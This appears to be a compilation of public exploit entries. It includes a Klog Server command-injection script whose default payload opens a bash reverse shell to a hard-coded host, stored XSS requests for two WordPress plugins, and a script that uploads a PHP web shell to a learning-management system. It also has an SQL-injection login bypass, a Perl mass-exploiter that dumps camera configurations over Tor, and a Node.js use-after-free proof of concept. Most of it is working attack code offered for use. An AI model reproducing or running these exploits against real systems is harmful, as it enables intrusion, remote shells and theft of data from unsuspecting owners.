# Exploit Title: Klog Server 2.4.1 - Command Injection (Unauthenticated)
# Date: 22.12.2020
# Exploit Author: b3kc4t (Mustafa GUNDOGDU)
# Vendor Homepage: https://www.klogserver.com/
# Version: 2.4.1
# Tested On: Ubuntu 18.04
# CVE: 2020-35729
# Description: https://github.com/mustgundogdu/Research/tree/main/KLOG_SERVER

"""
         ~ VULNERABILITY DETAILS ~

    #
    The Klog Server runs the injected os commands on the server , causing os command
    injection vulnerability.    

    #
    The following python code will inject os command payload and can be relaized reverse
    shell connection.And you can be added payload except the default payload plugin.

    ##USAGE##

    $sudo nc -nlvp 98
    $sudo python klog_exploit.py --exploit --url https://10.10.56.51:443/actions/authenticate.php --payload "test\"$bash -i >& /dev/tcp/10.10.56.52/98 0>&1&\""

    ##OUTPUT##

    bash-4.2$whoami
    apache
    bash-4.2$

"""

import requests
import argparse
from colorama import Fore, Back, Style, init


def main():

    desc = "KLOG SERVER 2.4.1 EXPLOIT"
    parser = argparse.ArgumentParser(description=desc)
    option = parser.add_argument_group('[*]OPTIONS[*]')
    parser.add_argument("--url", help=Fore.GREEN+"[*]TARGET URL ADDRESS[*]", required=False)
    parser.add_argument("--payload",help=Fore.GREEN+"[*] TO ADD PAYLOAD  [*]", type=str,required=False)
    parser.add_argument("--exploit", help=Fore.GREEN+"", action="store_true")
    args = parser.parse_args()

    if args.exploit:

        if args.url:
            url = args.url

            if args.payload:
                payload = args.payload
                target_send_config(url, payload)

            #default bash reverse shell payload
            else:
                payload = "test\"&bash -i >& /dev/tcp/10.10.56.52/88 0>&1&\""
                target_send_config(url, payload)

        else:
            #default url (klog server init ip address)
            url = "https://10.10.56.51:443/actions/authenticate.php"

            if args.payload:
                payload = args.payload
                target_send_config(url, payload)
            else: 
                payload = "test\"&bash -i >& /dev/tcp/10.10.56.52/88 0>&1&\""
                target_send_config(url, payload)


def target_send_config(url, payload):

    headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:84.0) Gecko/20100101 Firefox/84.0", 
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", 
"Accept-Language": "en-US,en;q=0.5", 
"Accept-Encoding": "gzip, deflate", 
"Content-Type": "application/x-www-form-urlencoded", 
"Connection": "close", 
"Upgrade-Insecure-Requests": "1"}
    #injection place
    data = {"user": payload, 
"pswd": "test"}

    try:
    #post method send    
        requests.post(url, headers=headers, data=data, verify=False)
        print("")
        print(Fore.GREEN+""+"[+] EXPLOIT SUCCESSFUL PAYLOAD IS SENT [+]")
    except:
        print(Fore.RED+"[-] EXPLOIT FAILED [-]")

if __name__ == '__main__':
    main()

# Exploit Title: WordPress Plugin Stripe Payments 2.0.39 - 'AcceptStripePayments-settings[currency_code]' Stored XSS
# Date: 04-01-2021
# Software Link: https://wordpress.org/plugins/stripe-payments/#developers
# Exploit Author: Park Won Seok
# Contact: kkigg39@gmail.com
# Category: Webapps
# Version: stripe-payments (Ver_2.0.39)
# Tested on: Windows 10 x64

# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins stripe-payments (Ver_2.0.39)
# Vulnerability parameters : "AcceptStripePayments-settings[currency_code]" have Cross-Site Scripting.

# POC -  Stored Cross-Site Scripting

POST /wp-admin/options.php HTTP/1.1
Host:  localhost
Content-Length: 5786
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http:// localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer:
http://192.168.31.131/wp-admin/edit.php?post_type=asp-products&page=stripe-payments-settings
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.9,en;q=0.8
Cookie:
wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7C50b0c8ba4dcc6dfdd756418c9fc960d3736f93a0febf165408110ea815dbab03;
wordpress_test_cookie=WP%20Cookie%20check;
wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609074082%7C6vGILxkmE1tZmBRmymy2iwNfvpGntlQfhEhwVLDGHFu%7Cb3e517e751d2519dc5473f911230fe31c966c9c755f193344b4bdea80a09d8b4;
asp_transient_id=36985e31f4be2b5ae0e14586c592c87d;
wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist;
wp-settings-time-1=1608903490
Connection: close

wp-asp-urlHash=general&option_page=AcceptStripePayments-settings-group&action=update&_wpnonce=eee296fed3&_wp_http_referer=%2Fwp-admin%2Fedit.php%3Fpost_type%3Dasp-products%26page%3Dstripe-payments-settings&AcceptStripePayments-settings%5Bcheckout_url%5D=http%3A%2F%2F192.168.31.131%2Fstripe-checkout-result%2F&asp_products_page_url_value=http%3A%2F%2F192.168.31.131%2Fproducts%2F&
*AcceptStripePayments-settings%5Bcurrency_code%5D=USDjk9v0%22%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3edr45t*
&AcceptStripePayments-settings%5Bcurrency_symbol%5D=%24&AcceptStripePayments-settings%5Bbutton_text%5D=Buy+Now&AcceptStripePayments-settings%5Bpopup_button_text%5D=Pay+%25s&AcceptStripePayments-settings%5Bcheckout_lang%5D=&AcceptStripePayments-settings%5Bpopup_default_country%5D=0&AcceptStripePayments-settings%5Bapi_publishable_key%5D=1&AcceptStripePayments-settings%5Bapi_secret_key%5D=2&AcceptStripePayments-settings%5Bapi_publishable_key_test%5D=3&AcceptStripePayments-settings%5Bapi_secret_key_test%5D=4&AcceptStripePayments-settings%5Bbuyer_email_type%5D=text&AcceptStripePayments-settings%5Bfrom_email_address%5D=test+%3Csales%
40your-domain.com
%3E&AcceptStripePayments-settings%5Bbuyer_email_subject%5D=Thank+you+for+the+purchase&AcceptStripePayments-settings%5Bbuyer_email_body%5D=Hello%0D%0A%0D%0AThank+you+for+your+purchase%21+You+ordered+the+following+item%28s%29%3A%0D%0A%0D%0A%7Bproduct_details%7D&AcceptStripePayments-settings%5Bseller_notification_email%5D=localhost%
40google.com <http://40naver.com/>
&AcceptStripePayments-settings%5Bseller_email_type%5D=text&AcceptStripePayments-settings%5Bseller_email_subject%5D=Notification+of+product+sale&AcceptStripePayments-settings%5Bseller_email_body%5D=Dear+Seller%0D%0A%0D%0AThis+mail+is+to+notify+you+of+a+product+sale.%0D%0A%0D%0A%7Bproduct_details%7D%0D%0A%0D%0AThe+sale+was+made+to+%7Bpayer_email%7D%0D%0A%0D%0AThanks&AcceptStripePayments-settings%5Bsend_email_on_error_to%5D=localhost%
40google.com <http://40naver.com/>
&AcceptStripePayments-settings%5Bprice_currency_pos%5D=left&AcceptStripePayments-settings%5Bprice_decimal_sep%5D=.&AcceptStripePayments-settings%5Bprice_thousand_sep%5D=%2C&AcceptStripePayments-settings%5Bprice_decimals_num%5D=2&AcceptStripePayments-settings%5Bcustom_field_name%5D=&AcceptStripePayments-settings%5Bcustom_field_descr%5D=&AcceptStripePayments-settings%5Bcustom_field_descr_location%5D=placeholder&AcceptStripePayments-settings%5Bcustom_field_position%5D=above&AcceptStripePayments-settings%5Bcustom_field_type%5D=text&AcceptStripePayments-settings%5Bcustom_field_validation%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_regex%5D=&AcceptStripePayments-settings%5Bcustom_field_custom_validation_err_msg%5D=Please+enter+valid+data&AcceptStripePayments-settings%5Btos_text%5D=I+accept+the+%3Ca+href%3D%22https%3A%2F%2Fexample.com%2Fterms-and-conditions%2F%22+target%3D%22_blank%22%3ETerms+and+Conditions%3C%2Fa%3E&AcceptStripePayments-settings%5Btos_position%5D=above&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUSD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEUR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BGBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BAUD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BARS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBAM%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBGN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BBRL%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCAD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCLP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCNY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCOP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCZK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BDKK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BEGP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHKD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BHUF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BINR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BIDR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BILS%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BJPY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BLBP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMYR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BMXN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNZD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BNOK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPEN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPHP%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BPLN%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRON%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BRUB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSGD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BZAR%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BKRW%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BSEK%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BCHF%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTWD%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTHB%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BTRY%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BUYU%5D=1&AcceptStripePayments-settings%5Ballowed_currencies%5D%5BVND%5D=1&AcceptStripePayments-settings%5Bpp_additional_css%5D=&AcceptStripePayments-settings%5Brecaptcha_site_key%5D=&AcceptStripePayments-settings%5Brecaptcha_secret_key%5D=&submit=Save+Changes

# Exploit Title: WordPress Plugin WP-Paginate 2.1.3 - 'preset' Stored XSS
# Date: 04-01-2021
# Software Link: https://wordpress.org/plugins/wp-paginate/
# Exploit Author: Park Won Seok
# Contact: kkigg39@gmail.com
# Category: Webapps
# Version: WP-Paginate(Ver-2.1.3)
# CVE : N/A
# Tested on: Windows 10 x64

# description:
# A Stored Cross-site scripting (XSS) was discovered in wordpress plugins WP-Paginate(Ver_2.1.3)
# Vulnerability parameters : 2nd parameter "preset" have Stored-XSS.

# POC -  Stored-XSS

POST /wp-admin/options-general.php?page=wp-paginate.php HTTP/1.1
Host: localhost
Content-Length: 348
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/wp-admin/options-general.php?page=wp-paginate.php
Accept-Encoding: gzip, deflate
Accept-Language: ko,en-US;q=0.9,en;q=0.8
Cookie:
wordpress_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7C94877ae306a5c59f9cdb81adc60a8cd6ad84e0e7551b18042ee0a33c9ab5cb31;
wordpress_test_cookie=WP%20Cookie%20check;
asp_transient_id=36985e31f4be2b5ae0e14586c592c87d;
wp-settings-1=mfold%3Do%26editor%3Dhtml%26posts_list_mode%3Dlist%26unfold%3D1;
wp-settings-time-1=1609001802;
wordpress_logged_in_5b1d7751a3da8a97505638936b7963ae=root%7C1609175102%7CsmSXDMcLQrRT6VE8KfGkKmVhXgpnCEAYtWIzvd91r78%7Cd570540f18447db0f0859be9e8e14bab64da22c8cf50fb8a80ebea73f188cb48
Connection: close

_wpnonce=8441c7c7b9&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-paginate.php&title=Pages%3A&previouspage=%26laquo%3B&nextpage=%26raquo%3B&position=none&font=font-inherit&preset=default&
*preset='%3e%3cscript%3ealert(document.cookie)%3c%2fscript%3e*
&before=%3Cdiv+class%3D%22navigation%22%3E&after=%3C%2Fdiv%3E&empty=on&css=on&range=3&anchor=1&gap=3&wp_paginate_save=Save+Changes

# Exploit Title: Online Learning Management System 1.0 - RCE (Authenticated)
# Date: 01.01.2021
# Exploit Author: Bedri Sertkaya
# Vendor Homepage: https://www.sourcecodester.com/php/7339/learning-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=7339&title=Online+Learning+Management+System+using+PHP%2FMySQLi+with+Source+Code
# Version: 1.0
# Tested on: Windows 10 / WAMP Server

import requests

cmd = "start cmd.exe" # Command to execute
target = "http://192.168.1.101/lms" #
username = "21100867"
password = "heni"
# Login and get session_cookie
url = target+"/login.php"
headers = {"Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "User-A=gent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML=, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Origin": "http://192.168.1.10=1", "Referer": "http://192.168.1.101/lms/", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
data = {"username": username, "password": password}
s = requests.post(url, headers=headers, data=data)
session_cookie = s.cookies.get_dict()

# Upload Shell
burp0_url = target+"/student_avatar.php"
burp0_cookies = session_cookie
burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": "http://192.168.1.101", "Content-Type": "multipart/form-data; boundary----WebKitFormBoundarybHBgGwgOFblz5IgL", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0=.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.1.101/lms/student_notification.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"}
burp0_data = "------WebKitFormBoundarybHBgGwgOFblz5IgL\r\nContent-Disposition: form-data; name=\"image\"; filename=\"exploit.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\r\nshell_exec('"+cmd+"');\r\n------WebKitFormBoundarybHBgGwgOFblz5IgL\r\nContent-Disposition: form-data; name=\"change\"\r\n\r\n\r\n------WebKitFormBoundarybHBgGwgOFblz5IgL--\r\n"
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

# Trigger exploit
trigger_url = "http://192.168.1.101:80/lms/admin/uploads/exploit.php"
trigger_cookies = session_cookie
requests.get(trigger_url, cookies=trigger_cookies)

# Exploit Title: Online Movie Streaming  1.0 - Authentication Bypass
# Date: 2020-12-27
# Exploit Author:  Kshitiz Raj (manitorpotterk)
# Vendor Homepage: https://www.sourcecodester.com/php/14640/online-movie-streaming-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14640&title=+Online+Movie+Streaming+in+PHP+with+Full+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Step 1 -  Go to url http://localhost/onlinemovie/user-login.php
Step 2 – Enter Username :-   anything@mail.com
Step 3 -  Enter Password - ' or '1'='1'#

#!/usr/bin/perl
#
#  PLANEX CS-QP50F-ING2 Security Surveillance Smart Camera Remote Configuration Disclosure - Mass Exploiter
#
#  Copyright 2021 (c) Todor Donev <todor.donev at gmail.com>
#
#  https://donev.eu/
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk! 
#
#
#

use strict;
use warnings;

use Getopt::Long; 
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random; 
use Data::Validate::IP;
use MCE::Hobo 1.817;
use MCE::Shared;
use Gzip::Faster 'gunzip';

my $queue1 = MCE::Shared->queue(fast => 1);
my $queue2 = MCE::Shared->queue(fast => 1);

my $redirects       = 3;
my $timeout         = 60;
my $targets         = undef;
my $threads         = 10;
my $tor             = undef;
my $dump            = undef;
my $gzip_magic      = "\x1F\x8B\x08";

printf("\n PLANEX CS-QP50F-ING2 Security Surveillance Smart Camera Remote Configuration Disclosure - Mass Exploiter\n");

sub help() {
    printf("\n $0 --targets=<FILENAME> [ --threads=10 --redirects=7 ] --help\n\n");
    printf("   Required args:\n\n");
    printf("   %-12s |  %s\n\n", "--targets", "Specify the list with addresses that you want to scan.");
    printf("   Not required args:\n\n");
    printf("   %-12s |  %s\n", "--dump", "Dump backup configuration file for each target");
    printf("   %-12s |  %s\n", "--tor", "Use Tor anonymity network");
    printf("   %-12s |  %s\n", "--timeout", "Specify HTTP request timeout. Default: 60");
    printf("   %-12s |  %s\n", "--threads", "Specify threads. Default: 10 / Maximum threads: 200");
    printf("   %-12s |  %s\n\n", "--redirects", "Specify HTTP response redirects. Default: 3");
    printf("   e.g. perl $0 --targets=portscan.log --threads=25\n");
    printf("   e.g. perl $0 --targets=portscan.log --threads=25 --tor\n");
    printf("   e.g. perl $0 --targets=portscan.log --threads=25 --tor --dump\n\n\n");
    printf(" Author: Todor Donev <todor.donev\@gmail.com> https://donev.eu/\n\n\n");
    exit;
}
GetOptions( 
"targets=s"     => \$targets,
"timeout=i"     => \$timeout,
"redirects=i"   => \$redirects,
"threads=i"     => \$threads,
"tor"           => \$tor,
"dump"          => \$dump,
"help|h!"       => \&help
    );
help() if (!$targets);
printf(" Error: TARGETLIST not exist, not readable, not plain or is empty!\n") and exit if (! -e $targets || -z $targets || ! -r $targets || ! -f $targets);
printf(" Error: Timeout is too short. Minimum timeout: 10\n") and exit if ($timeout < 10);
printf(" Error: Threads are too many. Maximum threads: 200\n") and exit if ($threads > 200);

my @tmp_targets = ();
my @targets = `cat $targets | grep -v '^[[:space:]]*[#;]' | uniq`;

for my $line (@targets) {
    chomp($line);
    next if ($line =~ /^(\s*(#.*)?)?$/);
    next if (not is_ipv4($line));
    push @tmp_targets, $line;
}

@tmp_targets = sort { $a cmp $b } @tmp_targets;
@targets = ();
@targets = @tmp_targets;
@tmp_targets = ();
printf(" Error: There are not valid targets specified for scanning.\n") and exit if (scalar @targets == 0);

printf("-------------------------------------------------------------------------------------------------------------\n");
printf(" Target                         Code                                     Status                              \n");
printf("-------------------------------------------------------------------------------------------------------------\n");


MCE::Hobo->create("work") for 1..$threads;

$queue1->enqueue(@targets);
$queue1->end;

while (my $result = $queue2->dequeue) {
    if (exists $result->{finished}) {
        MCE::Hobo->waitone;
        $queue2->end unless MCE::Hobo->pending;
        next;
    }
    my ($target, $code, $status) = ($result->{target}, $result->{code}, $result->{status});
    printf(" %-30.30s %-40.40s %-50.50s\n", $target, $code, $status);
}

exit;

sub work {
    while (my $addr = $queue1->dequeue()) {
        chomp($addr);
        my ($target, $code, $status) = scan($addr, $redirects, $timeout);
        $queue2->enqueue({ target => $target, code => $code, status => $status});
    }
    $queue2->enqueue({ finished => $$ });
    return;
}

    sub scan {
        my ($addr, $redirects, $timeout) = @_;
        my $user_agent = rand_ua("browsers");
        my $browser  = LWP::UserAgent->new( protocols_allowed => ['http', 'https'],ssl_opts => { verify_hostname => 0 });
        $browser->timeout($timeout);
        $browser->agent($user_agent);
        $browser->max_redirect($redirects);
        if (defined($tor)) {
            $browser->proxy([qw(http https)] => 'socks://127.0.0.1:9050');
        }
        my $target = "http://".$addr."\x2f\x77\x65\x62\x2f\x63\x67\x69\x2d\x62\x69\x6e\x2f\x68\x69\x33\x35\x31\x30\x2f\x62\x61\x63\x6b\x75\x70\x2e\x63\x67\x69";
        my $header = ["Content-Type" => "application/x-www-form-urlencoded; charset=UTF-8"];
        my $request = HTTP::Request->new (GET => $target, $header, "");        
        my $response = eval{ $browser->request($request) };
        my $status = ($response->content =~ m/($gzip_magic)/ && gunzip($response->content) =~ m/username/) ? "VULNERABLE" : "NOT VULNERABLE";
        if (defined($dump)) {
            if ($response->is_success && $status eq "VULNERABLE") {
                my @config = $response->content;
                my $config_file = $addr."_config_backup.bin";
                open (FH, "> $config_file") or die " Error: $config_file $!";
                flock (FH, 2);
                truncate (FH, 0);
                seek (FH, 0, 0);
                print (FH $_) foreach (@config);
                close (FH);
                @config = ();
            }
        }
        my $code = $response->status_line() ? $response->status_line() : "ERROR";
        return ($addr, $code, $status);
    }

Node.js: use-after-free in TLSWrap

Node v14.11.0 (Current) is vulnerable to a use-after-free bug in its TLS implementation.
When writing to a TLS enabled socket, node::StreamBase::Write calls node::TLSWrap::DoWrite
with a freshly allocated WriteWrap object as first argument. If the DoWrite method
does not return an error, this object is passed back to the caller as part of a 
StreamWriteResult structure:

  // stream_base-inl.h
  WriteWrap* req_wrap = CreateWriteWrap(req_wrap_obj);

  err = DoWrite(req_wrap, bufs, count, send_handle);
  bool async = err == 0;

  if (!async) {
    req_wrap->Dispose();
    req_wrap = nullptr;
  }

  const char* msg = Error();
  if (msg != nullptr) {
    req_wrap_obj->Set(env->context(),
                      env->error_string(),
                      OneByteString(env->isolate(), msg)).Check();
    ClearError();
  }

  return StreamWriteResult { async, err, req_wrap, total_bytes };

The problem is that TLSWrap::DoWrite can trigger a free of the WriteWrap object 
without returning an error when the EncOut() call at the end of the DoWrite method fails.
EncOut() calls underlying_stream()->Write() to write TLS encrypted data to the network socket.
If this write fails, InvokeQueued() is called and the function returns immediately:

  // tls_wrap.cc
  // Write any encrypted/handshake output that may be ready.
  // Guard against sync call of current_write_->Done(), its unsupported.
  in_dowrite_ = true;
  EncOut();
  in_dowrite_ = false;

  return 0;

  // tls_wrap.cc
  void TLSWrap::EncOut() {
  [...]

  Debug(this, \"Writing %zu buffers to the underlying stream\", count);
  StreamWriteResult res = underlying_stream()->Write(bufs, count);
  if (res.err != 0) {
    InvokeQueued(res.err);
    return;
  }
  [..]

InvokeQueued() triggers an immediate free of the req_wrap WriteWrap* object via the
following call chain: 
node::TLSWrap::InvokeQueued -> node::StreamReq::Done -> node::WriteWrap::OnDone
-> node::StreamReq::Dispose -> node::BaseObjectPtrImpl<node::AsyncWrap, false>::~BaseObjectPtrImpl()
-> node::BaseObject::decrease_refcount() -> node::SimpleWriteWrap<node::AsyncWrap>::~SimpleWriteWrap()

Making underlying_stream()->Write fail is as easy as closing the socket at the other side 
of the connection just before the write to trigger a broken pipe error. 

Because node::TLSWrap::DoWrite doesn't return an error code, node::StreamBase::Write will return 
the freed WriteWrap object as part of its StreamWriteResult. For calls by node::StreamBase::WriteV, 
this will immediately trigger a use-after-free when the SetAllocatedStorage() method 
is called on the freed object:

  // stream_base.cc
  StreamWriteResult res = Write(*bufs, count, nullptr, req_wrap_obj);
  SetWriteResult(res);
  if (res.wrap != nullptr && storage_size > 0) {
    res.wrap->SetAllocatedStorage(std::move(storage));
  }

The bug can be easily triggered against a simple node HTTPS server application. Under normal 
circumstances and without an ASAN enabled build, the UAF doesn't trigger a crash on Linux 
as the freed memory  won't get reallocated in time and the write in SetAllocatedStorage 
corrupts chunk metadata  that isn't used for small chunks. 
I think this is the only reason why the bug wasn't spotted earlier, as the broken pipe error path should be hit 
pretty often in the real world. However, this issue might still be exploitable with the right heap layout 
(if the WriteWrap chunk is merged with a larger chunk during the free), different heap implementations 
and/or some other control flow that allows to allocate something before the reuse. 

Proof-of-Concept:

server.js:
const https = require('https');

const key = `-----BEGIN EC PARAMETERS-----
BggqhkjOPQMBBw==
-----END EC PARAMETERS-----
-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIDKfHHbiJMdu2STyHL11fWC7psMY19/gUNpsUpkwgGACoAoGCCqGSM49
AwEHoUQDQgAEItqm+pYj3Ca8bi5mBs+H8xSMxuW2JNn4I+kw3aREsetLk8pn3o81
PWBiTdSZrGBGQSy+UAlQvYeE6Z/QXQk8aw==
-----END EC PRIVATE KEY-----`

const cert = `-----BEGIN CERTIFICATE-----
MIIBhjCCASsCFDJU1tCo88NYU//pE+DQKO9hUDsFMAoGCCqGSM49BAMCMEUxCzAJ
BgNVBAYTAkFVMRMwEQYDVQQIDApTb21lLVN0YXRlMSEwHwYDVQQKDBhJbnRlcm5l
dCBXaWRnaXRzIFB0eSBMdGQwHhcNMjAwOTIyMDg1NDU5WhcNNDgwMjA3MDg1NDU5
WjBFMQswCQYDVQQGEwJBVTETMBEGA1UECAwKU29tZS1TdGF0ZTEhMB8GA1UECgwY
SW50ZXJuZXQgV2lkZ2l0cyBQdHkgTHRkMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcD
QgAEItqm+pYj3Ca8bi5mBs+H8xSMxuW2JNn4I+kw3aREsetLk8pn3o81PWBiTdSZ
rGBGQSy+UAlQvYeE6Z/QXQk8azAKBggqhkjOPQQDAgNJADBGAiEA7Bdn4F87KqIe
Y/ABy/XIXXpFUb2nyv3zV7POQi2lPcECIQC3UWLmfiedpiIKsf9YRIyO0uEood7+
glj2R1NNr1X68w==
-----END CERTIFICATE-----`

const options = {
  key: key,
  cert: cert,
};

https.createServer(options, function (req, res) {
  res.writeHead(200);
  res.end(\"hello world\
\");
}).listen(4444);

---

poc.js:

const tls = require('tls')

var socket = tls.connect(4444, 'localhost', {rejectUnauthorized : false}, () => {
  console.log(\"connected\")
  socket.write(\"GET / HTTP/1.1\\
Host: localhost\\
Connection: Keep-alive\\
\\
\")
  socket.write(\"GET / HTTP/1.1\\
Host: localhost\\
Connection: Keep-alive\\
\\
\")
  socket.write(\"GET / HTTP/1.1\\
Host: localhost\\
Connection: Keep-alive\\
\\
\")
})


socket.on('data', () => {
  socket.destroy()
})  





The POC triggers a crash when server.js is run on an ASAN enabled build of node.js: 

==1408671==ERROR: AddressSanitizer: heap-use-after-free on address 0x608000011138 at pc 0x0000011929b6 bp 0x7ffc8c2243f0 sp 0x7ffc8c2243e8
READ of size 8 at 0x608000011138 thread T0
    #0 0x11929b5 in std::__uniq_ptr_impl<v8::BackingStore, std::default_delete<v8::BackingStore> >::_M_ptr() const /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:154:42
    #1 0x1192974 in std::unique_ptr<v8::BackingStore, std::default_delete<v8::BackingStore> >::get() const /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:361:21
    #2 0x1193fb4 in std::unique_ptr<v8::BackingStore, std::default_delete<v8::BackingStore> >::operator bool() const /usr/bin/../lib/gcc/x86_64-linux-gnu/9/../../../../include/c++/9/bits/unique_ptr.h:375:16
    #3 0x1190415 in node::AllocatedBuffer::data() /pwd/out/../src/allocated_buffer-inl.h:79:8
    #4 0x16f8a79 in node::WriteWrap::SetAllocatedStorage(node::AllocatedBuffer&&) /pwd/out/../src/stream_base-inl.h:247:3
    #5 0x16f1141 in node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:172:15
    #6 0x16faa47 in void node::StreamBase::JSMethod<&(node::StreamBase::Writev(v8::FunctionCallbackInfo<v8::Value> const&))>(v8::FunctionCallbackInfo<v8::Value> const&) /pwd/out/../src/stream_base.cc:468:29
    #7 0x1caf642 in v8::internal::FunctionCallbackArguments::Call(v8::internal::CallHandlerInfo) /pwd/out/../deps/v8/src/api/api-arguments-inl.h:158:3
    #8 0x1cabfaf in v8::internal::MaybeHandle<v8::internal::Object> v8::internal::(anonymous namespace)::HandleApiCallHelper<false>(v8::internal::Isolate*, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::HeapObject>, v8::internal::Handle<v8::internal::FunctionTemplateInfo>, v8::internal::Handle<v8::internal::Object>, v8::internal::BuiltinArguments) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:111:36
    #9 0x1ca8f8a in v8::internal::Builtin_Impl_HandleApiCall(v8::internal::BuiltinArguments, v8::internal::Isolate*) /pwd/out/../deps/v8/src/builtins/builtins-api.cc:141:5
